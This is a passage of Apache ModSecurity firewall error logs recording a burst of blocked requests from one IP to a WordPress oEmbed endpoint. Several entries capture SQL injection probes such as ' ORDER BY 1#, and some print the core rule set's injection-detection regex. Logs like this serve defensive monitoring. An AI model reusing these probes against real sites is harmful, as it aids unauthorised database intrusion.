"Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26ykPAyXqJhbW53WyPUAAAAEc"] [Thu Aug 15 03:22:34.531595 2024] [:error] [pid 31336:tid 139653856315136] [client 141.98.81.52:56904] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26ykPAyXqJhbW53WyPUQAAAFE"] [Thu Aug 15 03:22:34.977721 2024] [:error] [pid 31337:tid 139653864707840] [client 141.98.81.52:56908] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26yuwCyyCVFXh0DMS2gAAAAJA"] [Thu Aug 15 03:22:35.458974 2024] [:error] [pid 31336:tid 139653889885952] [client 141.98.81.52:56910] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26y0PAyXqJhbW53WyPUwAAAE0"] [Thu Aug 15 03:22:35.941031 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56912] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26y3xeJlWfH1pdny5XTQAAANc"] [Thu Aug 15 03:22:36.396849 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:56914] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26zHxeJlWfH1pdny5XTgAAANI"] [Thu Aug 15 03:22:36.780561 2024] [:error] [pid 31336:tid 139653814351616] [client 141.98.81.52:56916] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26zEPAyXqJhbW53WyPVAAAAFY"] [Thu Aug 15 03:22:37.183473 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:56918] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26zXxeJlWfH1pdny5XTwAAAM4"] [Thu Aug 15 03:22:37.663370 2024] [:error] [pid 31337:tid 139653906671360] [client 141.98.81.52:56920] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26zewCyyCVFXh0DMS2gQAAAIs"] [Thu Aug 15 03:22:38.193830 2024] [:error] [pid 31337:tid 139653948634880] [client 141.98.81.52:56922] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26zuwCyyCVFXh0DMS2ggAAAIY"] [Thu Aug 15 03:22:38.629433 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:56924] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26znxeJlWfH1pdny5XUAAAAMA"] [Thu Aug 15 03:22:39.056542 2024] [:error] [pid 31337:tid 139653881493248] [client 141.98.81.52:56926] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26z-wCyyCVFXh0DMS2gwAAAI4"] [Thu Aug 15 03:22:39.578542 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:56928] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26z3xeJlWfH1pdny5XUQAAAMU"] [Thu Aug 15 03:22:39.939719 2024] [:error] [pid 31335:tid 139654024500992] [client 141.98.81.52:56930] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26z20MD5oChETZltkVVwAAAAU"] [Thu Aug 15 03:22:40.342005 2024] [:error] [pid 31519:tid 139654032893696] [client 141.98.81.52:56932] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260HxeJlWfH1pdny5XUgAAAMQ"] [Thu Aug 15 03:22:40.761108 2024] [:error] [pid 31336:tid 139653831137024] [client 141.98.81.52:56934] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/%' ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260EPAyXqJhbW53WyPVQAAAFQ"] [Thu Aug 15 03:22:41.250878 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:56938] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260XxeJlWfH1pdny5XVAAAAMk"] [Thu Aug 15 03:22:41.621228 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:56942] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260XxeJlWfH1pdny5XVgAAAMY"] [Thu Aug 15 03:22:42.041372 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:56944] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260nxeJlWfH1pdny5XVwAAANQ"] [Thu Aug 15 03:22:42.470416 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:56946] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260nxeJlWfH1pdny5XWAAAAMI"] [Thu Aug 15 03:22:42.939403 2024] [:error] [pid 31337:tid 139653839529728] [client 141.98.81.52:56948] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260uwCyyCVFXh0DMS2hAAAAJM"] [Thu Aug 15 03:22:43.384348 2024] [:error] [pid 31337:tid 139654058071808] [client 141.98.81.52:56950] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr260-wCyyCVFXh0DMS2hQAAAIE"] [Thu Aug 15 03:22:43.844873 2024] [:error] [pid 31336:tid 139653822744320] [client 141.98.81.52:56952] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr2600PAyXqJhbW53WyPVgAAAFU"] [Thu Aug 15 03:22:44.343522 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:56954] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261HxeJlWfH1pdny5XWQAAAMc"] [Thu Aug 15 03:22:44.896013 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:56956] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261HxeJlWfH1pdny5XWgAAANE"] [Thu Aug 15 03:22:45.233911 2024] [:error] [pid 31335:tid 139653839529728] [client 141.98.81.52:56958] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261W0MD5oChETZltkVWAAAABM"] [Thu Aug 15 03:22:45.765198 2024] [:error] [pid 31337:tid 139653814351616] [client 141.98.81.52:56960] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:url: https://investigacionperu.com/contacto/ ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261ewCyyCVFXh0DMS2hgAAAJY"] [Thu Aug 15 03:22:46.157915 2024] [:error] [pid 31337:tid 139653831137024] [client 141.98.81.52:56962] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261uwCyyCVFXh0DMS2hwAAAJQ"] [Thu Aug 15 03:22:46.563858 2024] [:error] [pid 31336:tid 139654066464512] [client 141.98.81.52:56964] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261kPAyXqJhbW53WyPVwAAAEA"] [Thu Aug 15 03:22:46.989255 2024] [:error] [pid 31336:tid 139653805958912] [client 141.98.81.52:56966] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261kPAyXqJhbW53WyPWAAAAFc"] [Thu Aug 15 03:22:47.402364 2024] [:error] [pid 31337:tid 139653889885952] [client 141.98.81.52:56968] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261-wCyyCVFXh0DMS2iAAAAI0"] [Thu Aug 15 03:22:47.837680 2024] [:error] [pid 31337:tid 139653856315136] [client 